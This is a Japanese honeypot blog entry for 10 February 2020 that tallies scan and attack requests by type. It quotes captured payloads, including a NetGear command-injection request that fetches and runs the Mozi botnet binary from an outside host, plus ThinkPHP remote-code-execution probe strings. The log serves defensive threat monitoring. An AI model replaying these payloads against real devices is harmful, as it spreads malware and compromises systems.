23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(329日目)

2020/02/10(月)

トータルは253件でした。

ハンティングログは以下です。

180.115.114[.]57 wget+hxxp[:]//180.115[.]114.57:53248/Mozi.m

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
98 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
51 アクセス GET /
26 調査 GET /script
7 調査 GET /is_test
5 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
4 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
4 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
2 POST /users?page=&size=5
2 phpMyAdminの調査 GET /phpmyadmin/scripts/setup.php
2 phpMyAdminの調査 GET /phpMyAdmin/scripts/setup.php
2 phpMyAdminの調査 GET /myadmin/scripts/setup.php
2 Tomcatの調査 GET /manager/text/list
2 ZmEuによるphpMyAdminのスキャン GET /MyAdmin/scripts/setup.php
1 IPカメラ調査 GET /webcapture.jpg?command=snap&channel=1?COUNTER
1 phpMyAdminの調査 GET /w00tw00t.at.blackhats.romanian.anti-sec:)
1 IPカメラ調査 GET /videostream.cgi?user=admin&pwd=
1 IPカメラ調査 GET /video/mjpg.cgi
1 phpMyAdminの調査 GET /sqladmin/scripts/setup.php
1 phpMyAdminの調査 GET /sqladm/scripts/setup.php
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 IPカメラ調査 GET /snap.jpg?JpegSize=M&JpegCam=1&r=COUNTER
1 IPカメラ調査 GET /shot.jpg?rnd=654321
1 NetGearの脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//180.115.114.57:53248/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 phpMyAdminの調査 GET /scripts/setup.php
1 phpMyAdminの調査 GET /pma/scripts/setup.php%20
1 phpMyAdminの調査 GET /pma/scripts/setup.php
1 phpMyAdminの調査 GET /phpadmin/scripts/setup.php%20
1 phpMyAdminの調査 GET /pHpMyAdMiN/scripts/setup.php%20
1 IPカメラ調査 GET /out.jpg?q=30&id=0.1317044913727916&r=COUNTER
1 IPカメラ調査 GET /oneshotimage1?COUNTER
1 phpMyAdminの調査 GET /mysql/scripts/setup.php%20
1 IPカメラ調査 GET /mjpg/video.mjpg
1 IPカメラ調査 GET /mjpeg.cgi
1 IPカメラ調査 GET /live.jpg?&&&COUNTER
1 IPカメラ調査 GET /jpg/image.jpg?COUNTER
1 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 IPカメラ調査 GET /img/video.mjpeg
1 IPカメラ調査 GET /image?speed=0
1 GET /dbadmin/scripts/setup.php%20
1 GET /db/scripts/setup.php
1 IPカメラ調査 GET /cgi-bin/viewer/video.jpg?r=COUNTER
1 IPカメラ調査 GET /cgi-bin/snapshot.cgi?chn=6&u=admin&p=&q=0&COUNTER
1 IPカメラ調査 GET /cgi-bin/snapshot.cgi?chn=3&u=admin&p=&q=0&COUNTER
1 IPカメラ調査 GET /cgi-bin/snapshot.cgi?chn=2&u=admin&p=&q=0&COUNTER
1 IPカメラ調査 GET /cgi-bin/snapshot.cgi?chn=1&u=admin&p=&q=0&COUNTER
1 IPカメラ調査 GET /cgi-bin/snapshot.cgi?chn=0&u=admin&p=&q=0&COUNTER
1 IPカメラ調査 GET /cgi-bin/faststream.jpg?stream=half&fps=15&rand=COUNTER
1 IPカメラ調査 GET /cgi-bin/camera?resolution=640&quality=1&Language=0&COUNTER
1 IPカメラ調査 GET /cam_1.cgi
1 IPカメラ調査 GET /axis-cgi/mjpg/video.cgi?camera=&resolution=640x480
1 IPカメラ調査 GET /SnapshotJPEG?Resolution=640x480&Quality=Clarity&COUNTER
1 phpMyAdminの調査 GET /PHPMYADMIN/scripts/setup.php%20
1 IPカメラ調査 GET /GetData.cgi?CH=1
1 IPカメラ調査 GET /?action=stream
1 ThinkCMFの調査 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 IPカメラ調査 GET /-wvhttp-01-/GetOneShot?image_size=640x480&frame_count=1000000000
1 不正中継の試み CONNECT ip.ws.126.net:443